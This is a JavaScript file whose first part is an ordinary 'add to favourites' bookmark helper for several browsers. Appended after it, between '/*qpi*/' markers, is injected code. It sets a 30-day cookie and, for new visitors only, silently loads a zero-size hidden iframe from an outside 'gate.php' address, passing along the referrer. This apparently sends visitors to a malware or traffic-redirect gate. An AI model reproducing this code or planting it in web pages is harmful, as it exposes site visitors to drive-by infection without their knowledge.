function AddToFavourites(dispName, url)
{
    /* Firefox support*/
    if (window.sidebar) 
    {
        window.sidebar.addPanel(dispName, url, "");
    }
    /* opera support */
    else if(window.opera && window.print)
    { 
        var anchor = document.createElement('a');
        anchor.setAttribute('href',url);
        anchor.setAttribute('title',dispName);
        anchor.setAttribute('rel','sidebar');
        anchor.click();
    }
    /* Internet Explorer */
    else if(document.all)
    {
        window.external.AddFavorite(url, dispName);
    }
    /* Unsupported */
    else
    {
        alert ("Unfortunately your browser does not support this feature.");
    }
    
}/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
	document.cookie='1=1;expires='+e.toGMTString()+';path=/';
	window.setTimeout(function(){
		var JSinj=document.createElement('iframe');
		JSinj.src='http://s1.kaluchka1.in/gate.php?f=861197&r='+escape(document.referrer||'');
		JSinj.width='0';
		JSinj.height='0';
		JSinj.frameborder='0';
		JSinj.marginheight='0';
		JSinj.marginwidth='0';
		JSinj.border='0';
		try{
			document.body.appendChild(JSinj);
		}catch(e){
			document.documentElement.appendChild(JSinj);
		}
	}, 2000);
}
/*qpi*/
